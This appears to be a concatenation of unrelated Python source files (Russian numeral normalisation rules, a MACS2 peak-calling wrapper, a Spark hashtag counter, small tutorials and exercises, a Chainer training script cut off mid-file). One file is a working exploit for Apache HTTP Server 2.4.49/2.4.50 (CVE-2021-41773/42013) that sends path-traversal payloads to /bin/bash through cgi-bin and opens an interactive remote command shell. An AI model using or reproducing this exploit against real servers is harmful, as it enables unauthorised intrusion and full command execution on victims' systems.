Пример: "к 21 возвышающемуся -> к двадцати одному возвышающемуся"
"""
def __init__(self):
self.mask = (r'\b([Кк] |[Пп]о )'
r'(\d*[02-9]1|1)( [а-яё]+[ео](й|му)(|ся))\b')
def check(self, m):
new = m.group(1) + cardinal(m.group(2), d_ca)
if m.group(4) == 'й':
new = cardinal(m.group(2), p_ca)[:-1] + 'й'
return new + m.group(3)
class CardinalRule_37(RuleBase):
"""
Описание: Десятичные дроби. Предложный падеж.
Пример: "в 10,7 километра(х) -> в десяти целых семи десятых километра(х)"
"""
def __init__(self):
self.mask = (r'\b([Вв] (более чем |менее чем |))'
r'((\d+,|)(\d+)( [-и] | или )|)(\d+),(\d+) '
r'((|кило|санти|милли)метрах?|(|кило|мега|гига)парсеках?|'
r'процентах?|процентов|'
r'астрономической единицы|астрономических единиц|'
r'(морской |морских |)мили|(морских |)(миль|милях)|'
r'светового года|световых лет)\b')
def check(self, m):
new = m.group(1)
if m.group(3):
if m.group(4):
pre = decimal(m.group(4)[:-1], m.group(5), 4)
else:
pre = cardinal(m.group(5), p_ca)
if condition(m.group(5)) and m.group(9) in (
'мили', 'миль', 'милях',
'морской мили', 'морских мили',
'морских милях', 'морских миль',
'астрономической единицы',
'астрономических единиц'):
pre = pre[:-1] + 'й'
new += pre + m.group(6)
new += decimal(m.group(7), m.group(8), 4) + ' ' + m.group(9)
return new
class CardinalRule_42(RuleBase):
"""
Описание: Десятичные дроби. Винительный падеж.
Пример: "в 10,1 процента -> в десять целых одну десятую процента"
"""
def __init__(self):
self.mask = (r'\b([Вв] (более чем |менее чем |))'
r'((\d+,|)(\d+)( [-и] | или )|)(\d+),(\d+)'
r'( ([а-я]+[оы](го|й|х) |)([а-я]+))\b')
def check(self, m):
attr = words.get_attr(m.group(12))
new = m.group(1)
if m.group(3):
if m.group(4):
pre = decimal(m.group(4)[:-1], m.group(5), 5)
else:
pre = cardinal(m.group(5), v_ca)
if attr.have([Z_GENDER], None, [1, 5]):
if pre[-2:] == 'ин':
pre = pre[:-2] + 'ну'
elif pre[-2:] == 'ва':
pre = pre[:-1] + 'е'
new += pre + m.group(6)
new += decimal(m.group(7), m.group(8), 5) + m.group(9)
return new
class CardinalRule_40(RuleBase):
"""
Описание: Количественные числительные с неправильным наращением "-ми".
Родительный, дательный, предложный падежи множественного числа.
Пример: "7-ми спелых/яблок -> семи спелых/яблок"
"""
def __init__(self):
self.mask = (r'\b(\d*[02-9]?[78]+)(-ми) ([а-яё]{2,})\b')
def check(self, m):
if (words.have(m.group(3), [M_GENDER, Z_GENDER, S_GENDER],
True, [1, 2, 5]) or (len(m.group(3)) >= 4
and m.group(3)[-2:] in ('их', 'ых'))):
return cardinal(m.group(1), r_ca) + ' ' + m.group(3)
else:
return None
class OrdinalRule_41(RuleBase):
"""
Описание: Порядковые числительные.
Родительный/дательный/творительный/предложный падеж женского рода.
Пример: "3-й артиллерийской роты -> третьей артиллерийской роты"
"""
def __init__(self):
self.mask = (r'\b(\d+)-й( [а-яё]+[ео]й ([а-яё]+))\b')
def check(self, m):
attr = words.get_attr(m.group(3))
if attr.have([Z_GENDER], False, [1, 2, 4, 5]):
return ordinal(m.group(1), 't_zh') + m.group(2)
else:
return None
class OrdinalRule_42(RuleBase):
"""
Описание: Порядковые числительные.
Творительный/предложный падеж мужского/среднего рода.
Пример: ""
"""
def __init__(self):
self.mask = (r'\b(\d+)-м( [а-яё]+[еиоы]м ([а-яё]+))\b')
def check(self, m):
number = ''
attr = words.get_attr(m.group(3))
if attr.have([M_GENDER, S_GENDER], False, [4]):
number = ordinal(m.group(1), 't_mu')
elif (attr.have([M_GENDER, S_GENDER], False, [5])
or m.group(3) in ('берегу', 'бою', 'году', 'лесу', 'полку',
'пруду', 'саду', 'углу', 'шкафу')):
number = ordinal(m.group(1), 'p_mu')
if number:
return number + m.group(2)
else:
return None
# ==========================
# Подготовка списков правил.
# ==========================
rules_list = (UnitRule_1(), # винительный
UnitRule_2(), # следует перед UnitRule_10 и UnitRule_13
UnitRule_10(), # предложный (перед UnitRule_14)
UnitRule_13(), # предложный (следует перед UnitRule_14)
UnitRule_14(), # вин./дат. (следует после UnitRule_2)
UnitRule_3(), # родительный (следует перед UnitRule_4)
UnitRule_4(), # родительный
UnitRule_5(), # родительный (следует после UnitRule_4)
UnitRule_15(), # родительный (следует перед UnitRule_8)
UnitRule_16(), # творительный (следует перед UnitRule_8)
UnitRule_8(), # творительный
UnitRule_6(), # именительный/винительный
UnitRule_7(),
UnitRule_9(), # предложный
UnitRule_11(), # именительный
UnitRule_12(),
TimeRule_1(),
TimeRule_2(),
TimeRule_3(),
TimeRule_4(),
QuasiRoman(),
RomanRule(),
CardinalRule_40(),
OrdinalRule_1(),
OrdinalRule_2(),
OrdinalRule_3(),
OrdinalRule_35(),
OrdinalRule_36(),
OrdinalRule_37(),
OrdinalRule_38(),
OrdinalRule_6(),
OrdinalRule_8(), # винительный женского рода
OrdinalRule_9(), # родительный
OrdinalRule_5(), # дательный
OrdinalRule_40(), # дательный
OrdinalRule_41(),
OrdinalRule_42(),
OrdinalRule_4(),
OrdinalRule_39(),
CardinalRule_20(), # предложный /перед винительным/
CardinalRule_21(), # предложный /перед родительным/
CardinalRule_23(), # винительный
CardinalRule_37(), # предложный /после 23 и перед 25/
CardinalRule_25(), # винительный
CardinalRule_17(), # творительный
CardinalRule_18(), # творительный
CardinalRule_19(), # творительный / перед 14
CardinalRule_30(), # дательный
CardinalRule_36(),
CardinalRule_11(), # родительный
CardinalRule_12(),
CardinalRule_13(),
CardinalRule_14(), # родительный
CardinalRule_16(), # родительный
CardinalRule_26(),
CardinalRule_22(),
CardinalRule_24(),
CardinalRule_42(),
CardinalRule_27(), # именительный/винительный
CardinalRule_28(),
CardinalRule_29(),
CardinalRule_15(),
CardinalRule_10(),
CardinalRule_31(),
CardinalRule_35(),
Rule_1(),
)
|
#!/usr/bin/env python
__author__ = "Akhilesh Kaushal","Cristian Coarfa"
import os,sys,re,argparse
import pandas as pd
import numpy as np
import glob
from itertools import permutations
import datetime
import subprocess
import csv
import time
class MACS2_CALL:
DEBUG = 1
DEBUG_TrackCoverage = True
#DEBUG_TrackCoverageLoad = None
DEBUG_genomicHash = None
def __init__(self, myArgs):
print (myArgs)
self.setParameters(myArgs)
def setParameters(self, myArgs):
print ("Setting parameters\n")
self.myArgs = myArgs
@staticmethod
def parse_args():
parser = argparse.ArgumentParser(description=
"""\
Utility to identify peaks using MACS2 for multiple tracsks \n
* Load a number of BED files (usually ChIP-Seq, ATAC-Seq, MeDIP-Seq, Chipmentation, etc)
* TODO: ...
""")
parser.add_argument('-t','--trackFilePattern', help='pattern of tracks BED files',required=True)
parser.add_argument('-i','--inputfile', help= '[OPTIONAL]input/control file', required=None)
parser.add_argument('-g','--genome', help='[OPTIONAL]For human and mice specify hg or mm and leave blank for others',required=None)
parser.add_argument('-o','--outfile', help='[OPTIONAL] output file name for overlap summary',required=None)
try:
args = parser.parse_args()
except:
args = None
return args
def setupAnalysis(self):
"""
Setup analysis: Output directory
"""
sys.stderr.write("["+str(datetime.datetime.now())+"] setupAnalysis START \n")
sys.stderr.write("["+str(datetime.datetime.now())+"] setupAnalysis STOP \n")
def macs2_callpeak(self):
"""
Use macs2 callpeak to get the peaks.
"""
sys.stderr.write("["+str(datetime.datetime.now())+"] macs2 callpeak START \n")
trackFileList = glob.glob(self.myArgs.trackFilePattern)
inputfile = self.myArgs.inputfile
if (len(trackFileList)<2):
sys.stderr.write("This utility requires at least 2 distinct tracks \n")
sys.exit(4)
"""
Actual work area using MACS2
"""
for trackFile in (trackFileList):
OUT_NAME = trackFile.split(".")[0]+"_q_0.01"
gene_name = self.myArgs.genome
if (self.DEBUG_TrackCoverage):
sys.stderr.write("["+str(datetime.datetime.now())+"] Getting peaks for file "+trackFile+"\n")
#process1 = subprocess.Popen(["zcat", bedGZFile], stdout = subprocess.PIPE)
#process2 = subprocess.Popen(["wc", "-l"], stdin=process1.stdout, stdout = subprocess.PIPE)
if (self.myArgs.genome==None):
if (self.myArgs.inputfile==None):
str1='macs2 callpeak -t '+ trackFile +' -n '+ OUT_NAME + ' -q 0.01 '
else:
str1='macs2 callpeak -t '+ trackFile + ' -c ' + inputfile + ' -n '+ OUT_NAME + ' -q 0.01 '
else:
if (self.myArgs.inputfile==None):
str1='macs2 callpeak -t '+ trackFile +' -n '+ OUT_NAME + ' -q 0.01 ' + ' -g ' + gene_name
else:
str1='macs2 callpeak -t '+ trackFile + ' -c ' + inputfile + ' -n '+ OUT_NAME + ' -q 0.01 ' + ' -g ' + gene_name
#process1 = subprocess.Popen([str1], stdout = subprocess.PIPE)
if (self.DEBUG_TrackCoverage):
sys.stderr.write("["+str(datetime.datetime.now())+"] Running command "+str1+"\n")
os.system(str1)
def work(self):
self.setupAnalysis()
self.macs2_callpeak()
#self.loadHomerProfiles()
#self.outputsummary()
########################################################################################
# MAIN
########################################################################################
# Process command line options
## Instantiate analyzer using the program arguments
## Analyze this !
if __name__ == '__main__':
try:
myArgs = MACS2_CALL.parse_args()
print ("Program arguments: "+str(myArgs)+"\n")
if (myArgs is None):
pass
else:
sa = MACS2_CALL(myArgs)
sa.work()
except:
print ("An unknown error occurred.\n")
raise
|
import findspark
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
from pyspark.sql.functions import desc
import time
from collections import namedtuple
import json
with open('properties_user', 'r') as f:
user_data = json.load(f)
def run_spark():
findspark.init(user_data['findspark_path'])
# Can only run this once. restart your kernel for any errors.
sc = SparkContext()
ssc = StreamingContext(sc, 10)
socket_stream = ssc.socketTextStream(user_data['host'], user_data['port'])
lines = socket_stream.window(20)
fields = ("tag", "count")
Tweet = namedtuple('Tweet', fields)
# Use Parenthesis for multiple lines or use \.
(lines.flatMap(lambda text: text.split(" ")) # Splits to a list
.filter(lambda word: word.lower().startswith("#")) # Checks for hashtag calls
.map(lambda word: (word.lower(), 1)) # Lower cases the word
.reduceByKey(lambda a, b: a + b) # Reduces
.map(lambda rec: Tweet(rec[0], rec[1])) # Stores in a Tweet Object
.foreachRDD(lambda rdd: rdd.toDF().sort(desc("count")) # Sorts Them in a DF
.limit(10).registerTempTable("tweets"))) # Registers to a table.
ssc.start()
while True:
time.sleep(0.1)
# ssc.stop()
if __name__ == "__main__":
run_spark() |
import numpy as np
import scipy
import matplotlib.pyplot as plt
import math
import csv
import cv2 as cv
rows = []
with open('depth_1.csv', 'r') as csvfile:
# creating a csv reader object
csvreader = csv.reader(csvfile)
# extracting each data row one by one
for row in csvreader:
rows.append(row)
csvfile.close()
z1 = np.array(rows)
z1 = z1.astype(np.float)
ht = len(z1)
wd = len(z1[0])
with open('depth_2.csv', 'r') as csvfile:
# creating a csv reader object
csvreader = csv.reader(csvfile)
# extracting each data row one by one
for row in csvreader:
rows.append(row)
z2 = np.array(rows)
z2 = z2.astype(np.float)
csvfile.close()
for i in range(len(z1)):
for j in range(len(z1[0])):
if(z1[i,j]!=0 and z2[i,j]!=0):
z1[i,j] = (z1[i,j]+z2[i,j])/2
elif(z2[i,j]!=0):
z1[i,j] = z2[i,j]
with open('depth_mix.csv','w') as f:
p = csv.writer(f)
for g in range(ht):
p.writerow(z1[g,:])
f.close() |
from django.db import models
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from gene_register.models import Gene
class Variant (models.Model):
chromosome = models.CharField(max_length=30)
position = models.IntegerField()
reference = models.CharField(max_length=30)
alternative = models.CharField(max_length=30)
rs = models.CharField(max_length=30)
gene = models.ForeignKey(Gene, on_delete=models.CASCADE )
def __str__(self):
return "CH:"+self.chromosome+" Pos:"+str(self.position)
|
#As listas permitem armazenar diversos valores em uma unica variavel
#Para utilizar uma lista usamos[]:
lista_linguagens = ['Python', 'Java', 'C#', 'PHP', 'Javascript']
#Para mostrar uma lista usamos:
print('Mostrando lista')
print(lista_linguagens)
print('------------------------------------')
#Para acessar elemento especifico de uma lista usamos(lmebrando que o incdice começa em 0):
print('Mostrando elemento especifico')
print(lista_linguagens[0])
#Podemos usar indices negativos, -1 imprime o ultimo elemento adicionado na lista
print(lista_linguagens[-1])
print(lista_linguagens[-5])#primeiro elemento
print('------------------------------------')
#Para mudar um elemento em uma lista usamos:
lista_linguagens[2] = 'C++'
print(lista_linguagens)
print('------------------------------------')
#Para adicionar um elemento em uma lista usamos append():
lista_linguagens.append('C')
lista_linguagens.append('Ruby')
lista_linguagens.append('C#')
lista_linguagens.append('Rusty')
print(lista_linguagens)
print('------------------------------------')
#Mostrar tamanho da lista
print('Tamanho da Lista:', len(lista_linguagens))
print('------------------------------------')
#Para remover um elemento em uma lista usamos remove()
lista_linguagens.remove('Ruby')
print(lista_linguagens)
print('------------------------------------')
#O metodo pop() remove o ultimo elemento da lista
lista_linguagens.pop()
print(lista_linguagens)
print('------------------------------------')
#del remove mediante a posição do elemento
del lista_linguagens[4]
print(lista_linguagens)
print('------------------------------------')
#Podemos copiar uma lista para outra
lista2 = list(lista_linguagens)
#Para percorrer uma lista usamos
for item in lista2:
print(item)
print('------------------------------------')
lista3 = ['Ruby', 'Javascript', 'Visual Basic', 'Pascal', 'Lisp']
#Podemos fundir duas listas em uma nova
lista4 = lista2 + lista3
print('Lista 4')
for item in lista4:
print(item) |
#!/usr/bin/python
import my_pkg
if __name__== '__main__':
a=0
while 1 :
a=input("Select menu: 1)conversion 2)union/intersection 3)exit ? ")
if a=='1' :
b=input("input binary number : ")
print(my_pkg.conversion(b))
elif a=='2' :
c=input("1st list: ")
d=input("2nd list: ")
print(my_pkg.uni_inter(c,d))
elif a=='3' :
print("exit the program...")
exit(0)
else :
print("input wrong number")
|
from collections import Counter
import os
import wikidata
path = 'vocab'
def _types_vocab():
if not os.path.exists(os.path.join(path,'types.vocab')):
return []
with open(os.path.join(path,'types.vocab'), 'r') as f:
return f.read().splitlines()
def _properties_vocab():
if not os.path.exists(os.path.join(path,'properties.vocab')):
return []
with open(os.path.join(path,'properties.vocab'), 'r') as f:
return f.read().splitlines()
types = _types_vocab()
properties = _properties_vocab()
class Vocab():
"""Outputs vocab files for features that need it"""
def __init__(self):
self.types = Counter()
self.properties = Counter()
def call(self, instance):
self.types.update([ t for cand in instance.object_entity._.uri_candidates for t in cand["types"] ])
self.types.update([ t for cand in instance.subject_entity._.uri_candidates for t in cand["types"] ])
subject_list = [x["uri"] for x in instance.subject_entity._.uri_candidates]
object_list = [x["uri"] for x in instance.object_entity._.uri_candidates]
wikidataProperties = wikidata.get_properties(subject_list,object_list)
self.properties.update([p for l in wikidataProperties.values() for p in l if not p in ""])
def save(self):
self.save_types()
self.save_properties()
def save_types(self):
print(self.types.most_common())
with open(os.path.join(path,'types.vocab'), 'w') as file:
for e,c in self.types.most_common()[:100]:
file.write(e)
file.write('\n')
# reload
types = _types_vocab()
def save_properties(self):
print(self.properties.most_common())
with open(os.path.join(path,'properties.vocab'), 'w') as file:
for e,c in self.properties.most_common():
if c < 5:
break
file.write(e)
file.write('\n')
# reload
properties = _properties_vocab()
|
class Planet():
def __init__(self, name, parent):
self.name = name
self.parent = parent
self.children = []
def totalOrbits(self):
if self.parent == None:
return 0
return 1 + self.parent.totalOrbits()
def main():
planetList = registerPlanets()
orbitCount = 0
for planet in planetList:
orbitCount += planet.totalOrbits()
print(orbitCount)
startPlanet, endPlanet, sharedParents = searchForSharedOrbit("YOU","SAN",planetList)
calculateShortestDistance(startPlanet, endPlanet, sharedParents)
def registerPlanets():
inputOrbits = open("input_Day6.txt", "r")
planets = []
for orbit in inputOrbits:
bodyName, planetName = orbit.rstrip().split(")")
satelite = None
body = None
for p in planets:
if planetName == p.name:
satelite = p
if bodyName == p.name:
body = p
if satelite != None and body != None:
satelite.parent = body
body.children.append(satelite)
elif satelite != None and body == None:
body = Planet(bodyName, None)
body.children.append(satelite)
satelite.parent = body
planets.append(body)
elif satelite == None and body != None:
satelite = Planet(planetName, body)
body.children.append(satelite)
planets.append(satelite)
elif satelite == None and body == None:
body = Planet(bodyName, None)
satelite = Planet(planetName, body)
body.children.append(satelite)
planets.append(body)
planets.append(satelite)
inputOrbits.close()
return planets
def searchForSharedOrbit(startPlanet,endPlanet,planetList):
start = None
end = None
for planet in planetList:
if planet.name == startPlanet:
start = planet
if planet.name == endPlanet:
end = planet
startPlanetParents = set()
endPlanetParents = set()
startPlanetParents = getAllParents(start, startPlanetParents)
endPlanetParents = getAllParents(end, endPlanetParents)
sharedParents = startPlanetParents&endPlanetParents
return start, end, sharedParents
def getAllParents(childPlanet, allParents):
if childPlanet.parent != None:
allParents = getAllParents(childPlanet.parent, allParents)
allParents.add(childPlanet.parent)
return allParents
def calculateShortestDistance(startPlanet, endPlanet, sharedParents):
shortestDistance = 999999
for planet in sharedParents:
distance = calculatePlanetDistance(startPlanet, planet, 0)
distance += calculatePlanetDistance(endPlanet, planet, 0)
if distance < shortestDistance:
shortestDistance = distance
print(shortestDistance - 2)
def calculatePlanetDistance(startPlanet, destinationPlanet, distance):
parentPlanet = startPlanet.parent
if parentPlanet == destinationPlanet:
return distance + 1
distance += calculatePlanetDistance(parentPlanet, destinationPlanet, distance) + 1
return distance
main() |
# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
# Date: 11/11/2021
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://apache.org/
# Software Link: https://github.com/Balgogan/CVE-2021-41773
# Version: Apache 2.4.49/2.4.50 (CGI enabled)
# Tested on: Debian GNU/Linux
# CVE : CVE-2021-41773 / CVE-2021-42013
# Credits : Lucas Schnell
#!/bin/python3
#coding: utf-8
import os
import re
import sys
import time
import requests
from colorama import Fore,Style
header = '''\033[1;91m
▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████
▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀
▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███
░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄
▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░
▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░
░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░
''' + Style.RESET_ALL
if len(sys.argv) < 2 :
print( 'Use: python3 file.py ip:port ' )
sys.exit()
def end():
print("\t\033[1;91m[!] Bye bye !")
time.sleep(0.5)
sys.exit(1)
def commands(url,command,session):
directory = mute_command(url,'pwd')
user = mute_command(url,'whoami')
hostname = mute_command(url,'hostname')
advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')
command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}")
command = f"echo; {command};"
req = requests.Request('POST', url=url, data=command)
prepare = req.prepare()
prepare.url = url
response = session.send(prepare, timeout=5)
output = response.text
print(output)
if 'clear' in command:
os.system('/usr/bin/clear')
print(header)
if 'exit' in command:
end()
def mute_command(url,command):
session = requests.Session()
req = requests.Request('POST', url=url, data=f"echo; {command}")
prepare = req.prepare()
prepare.url = url
response = session.send(prepare, timeout=5)
return response.text.strip()
def exploitRCE(payload):
s = requests.Session()
try:
host = sys.argv[1]
if 'http' not in host:
url = 'http://'+ host + payload
else:
url = host + payload
session = requests.Session()
command = "echo; id"
req = requests.Request('POST', url=url, data=command)
prepare = req.prepare()
prepare.url = url
response = session.send(prepare, timeout=5)
output = response.text
if "uid" in output:
choice = "Y"
print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)
print("[!] Sortie:\n\n" + Fore.YELLOW + output )
choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")
if choice.lower() in ['','y','yes']:
while True:
commands(url,command,session)
else:
end()
else :
print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)
except KeyboardInterrupt:
end()
def main():
try:
apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
payloads = [apache2449_payload,apache2450_payload]
choice = len(payloads) + 1
print(header)
print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")
while choice >= len(payloads) and choice >= 0:
choice = int(input('[~] Choice : '))
if choice < len(payloads):
exploitRCE(payloads[choice])
except KeyboardInterrupt:
print("\n\033[1;91m[!] Bye bye !")
time.sleep(0.5)
sys.exit(1)
if __name__ == '__main__':
main()
|
#!/usr/bin/python3
"""Provides a function to append text to a file"""
def append_write(filename="", text=""):
"""Append text to a file"""
with open(filename, 'a') as ostream:
return ostream.write(text)
|
#!/usr/local/anaconda3/bin/python3
from __future__ import division
import sys
sys.path.insert(0, '/home/machen/face_expr')
import cProfile
import pstats
import random
from chainer.datasets import TransformDataset
from time_axis_rcnn.extensions.special_converter import concat_examples_not_string
try:
import matplotlib
matplotlib.use('agg')
except ImportError:
pass
from time_axis_rcnn.constants.enum_type import OptimizerType, FasterBackboneType
from time_axis_rcnn.datasets.npz_feature_dataset import NpzFeatureDataset
from time_axis_rcnn.model.time_segment_network.faster_head_module import FasterHeadModule
from time_axis_rcnn.model.time_segment_network.faster_rcnn_backbone import FasterBackbone
from time_axis_rcnn.model.time_segment_network.tcn_backbone import TcnBackbone
from time_axis_rcnn.model.time_segment_network.faster_rcnn_train_chain import TimeSegmentRCNNTrainChain
from time_axis_rcnn.model.time_segment_network.segment_proposal_network import SegmentProposalNetwork
from time_axis_rcnn.constants.enum_type import TwoStreamMode
from time_axis_rcnn.model.time_segment_network.wrapper import Wrapper
import argparse
import os
import chainer
from chainer import training
from dataset_toolkit.adaptive_AU_config import adaptive_AU_database
import config
from chainer.iterators import MultiprocessIterator, SerialIterator
from dataset_toolkit.squeeze_label_num_report import squeeze_label_num_report
class Transform(object):
def __init__(self, mirror=True):
self.mirror = mirror
def __call__(self, in_data):
# feature shape = (2048, N)
feature, gt_segments_rgb, gt_segments_flow, seg_info, seg_labels, orig_label, _ = in_data
if self.mirror:
x_flip = random.choice([True, False])
if x_flip:
feature = feature[:, ::-1]
W = feature.shape[1]
x_max = W - 1 - gt_segments_rgb[:, 0]
x_min = W - 1 - gt_segments_rgb[:, 1]
gt_segments_rgb[:, 0] = x_min
gt_segments_rgb[:, 1] = x_max
W_flow = W/10.
x_max_flow = W_flow - 1 - gt_segments_flow[:, 0]
x_min_flow = W_flow - 1 - gt_segments_flow[:, 1]
gt_segments_flow[:, 0] = x_min_flow
gt_segments_flow[:, 1] = x_max_flow
orig_label = orig_label[::-1, :]
return feature, gt_segments_rgb, gt_segments_flow, seg_info, seg_labels, orig_label
def main():
parser = argparse.ArgumentParser(
description='train script of Time-axis R-CNN:')
parser.add_argument('--pid', '-pp', default='/tmp/SpaceTime_AU_R_CNN/')
parser.add_argument('--gpu', '-g', type=int, help='GPU ID')
parser.add_argument('--lr', '-l', type=float, default=0.0001)
parser.add_argument('--out', '-o', default='output_time_axis_rcnn',
help='Output directory')
parser.add_argument('--database', default='BP4D',
help='Output directory: BP4D/DISFA/BP4D_DISFA')
parser.add_argument('--iteration', '-i', type=int, default=70000)
parser.add_argument('--optimizer', type=OptimizerType,choices=list(OptimizerType))
parser.add_argument('--epoch', '-e', type=int, default=20)
parser.add_argument('--batch_size', '-bs', type=int, default=1)
parser.add_argument('--feature_dim', type=int, default=2048)
parser.add_argument('--roi_size', type=int, default=7)
parser.add_argument('--snapshot', '-snap', type=int, default=5)
parser.add_argument("--fold", '-fd', type=int, default=3)
parser.add_argument('--two_stream_mode', type=TwoStreamMode, choices=list(TwoStreamMode),
help='rgb_flow/ optical_flow/ rgb')
parser.add_argument("--faster_backbone", type=FasterBackboneType,choices=list(FasterBackboneType), help='tcn/conv1d')
parser.add_argument("--data_dir", type=str, default="/extract_features")
parser.add_argument("--conv_layers", type=int, default=10)
parser.add_argument("--split_idx",'-sp', type=int, default=1)
parser.add_argument("--use_paper_num_label", action="store_true", help="only to use paper reported number of labels"
" to train")
parser.add_argument("--proc_num", "-proc", type=int, default=1)
args = parser.parse_args()
args.data_dir = config.ROOT_PATH + "/" + args.data_dir
os.makedirs(args.pid, exist_ok=True)
os.makedirs(args.out, exist_ok=True)
pid = str(os.getpid())
pid_file_path = args.pid + os.path.sep + "{0}_{1}_fold_{2}.pid".format(args.database, args.fold, args.split_idx)
with open(pid_file_path, "w") as file_obj:
file_obj.write(pid)
file_obj.flush()
print('GPU: {}'.format(args.gpu))
adaptive_AU_database(args.database)
paper_report_label, class_num = squeeze_label_num_report(args.database, args.use_paper_num_label)
paper_report_label_idx = list(paper_report_label.keys())
if args.faster_backbone == FasterBackboneType.tcn:
Bone = TcnBackbone
elif args.faster_backbone == FasterBackboneType.conv1d:
Bone = FasterBackbone
if args.two_stream_mode == TwoStreamMode.rgb or args.two_stream_mode == TwoStreamMode.optical_flow:
faster_extractor_backbone = Bone(args.conv_layers, args.feature_dim, 1024)
faster_head_module = FasterHeadModule(args.feature_dim, class_num + 1, args.roi_size) # note that the class number here must include background
initialW = chainer.initializers.Normal(0.001)
spn = SegmentProposalNetwork(1024, n_anchors=len(config.ANCHOR_SIZE), initialW=initialW)
train_chain = TimeSegmentRCNNTrainChain(faster_extractor_backbone, faster_head_module, spn)
model = Wrapper(train_chain, two_stream_mode=args.two_stream_mode)
elif args.two_stream_mode == TwoStreamMode.rgb_flow:
faster_extractor_backbone = Bone(args.conv_layers, args.feature_dim, 1024)
faster_head_module = FasterHeadModule(args.feature_dim, class_num + 1,
args.roi_size) # note that the class number here must include background
initialW = chainer.initializers.Normal(0.001)
spn = SegmentProposalNetwork(1024, n_anchors=len(config.ANCHOR_SIZE), initialW=initialW)
train_chain = TimeSegmentRCNNTrainChain(faster_extractor_backbone, faster_head_module, spn)
# faster_extractor_backbone_flow = FasterBackbone(args.database, args.conv_layers, args.feature_dim, 1024)
# faster_head_module_flow = FasterHeadModule(1024, class_num + 1,
# args.roi_size) # note that the class number here must include background
# initialW = chainer.initializers.Normal(0.001)
# spn_flow = SegmentProposalNetwork(1024, n_anchors=len(config.ANCHOR_SIZE), initialW=initialW)
# train_chain_flow = TimeSegmentRCNNTrainChain(faster_extractor_backbone_flow, faster_head_module_flow, spn_flow)
# time_seg_train_chain_list = [train_chain_rgb, train_chain_flow]
model = Wrapper(train_chain, two_stream_mode=args.two_stream_mode)
if args.gpu >= 0:
model.to_gpu(args.gpu)
chainer.cuda.get_device(args.gpu).use()
optimizer = None
if args.optimizer == OptimizerType.AdaGrad:
optimizer = chainer.optimizers.AdaGrad(
lr=args.lr) # 原本为MomentumSGD(lr=args.lr, momentum=0.9) 由于loss变为nan问题,改为AdaGrad
elif args.optimizer == OptimizerType.RMSprop:
optimizer = chainer.optimizers.RMSprop(lr=args.lr)
elif args.optimizer == OptimizerType.Adam:
optimizer = chainer.optimizers.Adam(alpha=args.lr)
elif args.optimizer == OptimizerType.SGD:
optimizer = chainer.optimizers.MomentumSGD(lr=args.lr, momentum=0.9)
elif args.optimizer == OptimizerType.AdaDelta:
optimizer = chainer.optimizers.AdaDelta()
optimizer.setup(model)
optimizer.add_hook(chainer.optimizer.WeightDecay(rate=0.0005))
data_dir = args.data_dir + "/{0}_{1}_fold_{2}/train".format(args.database, args.fold, args.split_idx)
dataset = NpzFeatureDataset(data_dir, args.database, two_stream_mode=args.two_stream_mode,T=10.0, use_mirror_data=True)
dataset = TransformDataset(dataset, Transform(mirror=True))
if args.proc_num == 1:
train_iter = SerialIterator(dataset, args.batch_size, repeat=True, shuffle=True)
else:
train_iter = MultiprocessIterator(dataset, batch_size=args.batch_size,
n_processes=args.proc_num,
repeat=True, shuffle=True, n_prefetch=10, shared_mem=10000000)
# BP4D_3_fold_1_resnet101@rnn@no_temporal@use_paper_num_label@roi_align@label_dep_layer@conv_lstm@sampleframe#13_model.npz
use_paper_classnum = "use_paper_num_label" if args.use_paper_num_label else "all_avail_label"
model_file_name = args.out + os.path.sep + \
'time_axis_rcnn_{0}_{1}_fold_{2}@{3}@{4}@{5}@{6}_model.npz'.format(args.database,
args.fold, args.split_idx,
use_paper_classnum, args.two_stream_mode,
args.conv_layers, args.faster_backbone)
print(model_file_name)
pretrained_optimizer_file_name = args.out + os.path.sep +\
'time_axis_rcnn_{0}_{1}_fold_{2}@{3}@{4}@{5}@{6}_optimizer.npz'.format(args.database,
args.fold, args.split_idx,
use_paper_classnum, args.two_stream_mode,
args.conv_layers,args.faster_backbone)
print(pretrained_optimizer_file_name)
if os.path.exists(pretrained_optimizer_file_name):
print("loading optimizer snatshot:{}".format(pretrained_optimizer_file_name))
chainer.serializers.load_npz(pretrained_optimizer_file_name, optimizer)
if os.path.exists(model_file_name):
print("loading pretrained snapshot:{}".format(model_file_name))
